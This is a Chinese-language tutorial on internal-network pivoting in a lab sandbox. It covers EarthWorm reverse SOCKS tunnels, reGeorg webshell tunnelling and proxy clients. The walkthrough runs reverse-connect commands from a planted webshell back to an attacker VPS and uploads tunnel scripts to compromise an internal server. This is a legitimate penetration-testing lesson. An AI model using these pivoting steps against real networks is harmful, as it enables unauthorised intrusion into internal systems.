上周斗哥给大家介绍来“百香果”内网安全沙盘的构建,主要用于学习内网渗透的基础环境,那么内网渗透中最基础的就是内网通信隧道了,本期给大家带来内网通信隧道中SOCKS的学习。
工具介绍:
EarthWorm(EW)是一款便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件,以适用不同的操作系统。 EW的新版本为Termite。
工具常见命令:
EW共有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。 用于普通网络环境的正向连接命令是sscoksd。 用于反弹连接的命令是rcsocks、rssocks。 其他命令用于复杂网络环境的多级级联。
reGeorg主要功能是把内网服务器的端口通过HTTP/HTTPS隧道转发到本机,形成一个回路。 reGeorg可以使目标服务器在内网中(或者在设置了端口策略的情况下)连接内部开放端口。reGeorg利用WebShell建立一个SOCKS代理进行内网穿透,服务器必须支持ASPX、PHP、JSP中的一种。
https://github.com/sensepost/reGeorg。
工具原理
工具常见命令
$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]
Socks server for reGeorg HTTP(s) tunneller
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
用法示例:
$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
该脚本为python 2代码,使用该脚本需要安装urllib3库。
https://github.com/urllib3/urllib3
当其他端口无法建立隧道时,比如控制的服务器除了web端口外不出网。
SocksCap64是一款在Windows环境中相当好用的全局代理软件。SocksCap64可以使Windows应用程序通过SOCKS代理服务器来访问网络,而不需要对这些应用程序进行任何修改。即使是那些本身不支持SOCKS代理的应用程序,也可以通过SocksCap64实现代理访问。(有些情况下某些工具走代理无法启动,所以更推荐Proxifier!!)
Proxifier也是一款非常好用的全局代理软件。Proxifier提供了跨平台的端口转发和代理功能,适用于Windows、Linux、MacOS平台。
基本实验目的为掌握工具的基本使用场景、配置和使用。
R1、R2、R3、FW3、FW5均为“百香果”内网沙场拓扑图设备,开启后,其中FW3需配置NAT端口,将内网10.10.13.110的80端口映射到66.28.7.2的80端口。
VPS根据实验自行选择Windows或者Kali均可,IP为66.28.6.110,虚拟网卡为仅主机VM6。
内网WEB 服务器为一台windows2003服务器(该服务器可自行替换),已被传了一个webshell,shell外网访问方式为:http://66.28.7.2/shell.php。
内网DATA服务器为一台windows2003服务器(该服务器可自行替换),该服务器无法访问公网环境,因此需要在FW3上配置ACL。
配置ew 反向代理监听:
ew -s rcsocks -l 1008 -e 888
webshell:ew -s rssocks -d 66.28.6.110 -e 888
采用的火狐浏览的FoxyPorxy Standard插件
mstsc程序,该程序没有自带socks连接,所以需要借助SocksCap64代理软件来实现。
添加代理服务器:
添加测试地址:
找到mstsc.exe软件直接拖到SocksCap64代理软件。
右键选中,选择“在代理隧道中运行选中程序”
5. Proxifier 配置SOCKS通信
默认全局走代理
点击浏览选择一个程序如mstsc.exe
动作选择Proxy SOCKS5 127.0.0.1
此时, 360浏览器因为未添加到代理的程序中,所以走的是默认匹配规则:
mstsc.exe程序因为在第一条匹配规则里面,所以走的SOCKS代理路线。
VPS配置 使用该工具需要将tunnel脚本传到web目录上去。
python reGeorgSocksProxy.py -p 1080 -u http://66.28.7.2/tunnel.php
通过测试PHPStudy的环境都会报错:dll() Not supported in multithreaded Web servers。
所以上传tunnel.nosocket.php脚本。
python reGeorgSocksProxy.py -p 1080 -u http://66.28.7.2/tunnel.nosocket.php
建立成功后,后续隧道直接配置本地的SOCKS。
本期基于“百香果”内网沙场的SOCKS学习上篇就到这里了,下篇斗哥将以实战场景为模拟,在百香果内网沙盘上进行ew一级级联和二级级联场景和内网限制主动出网两个典型场景的演示,敬请期待。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。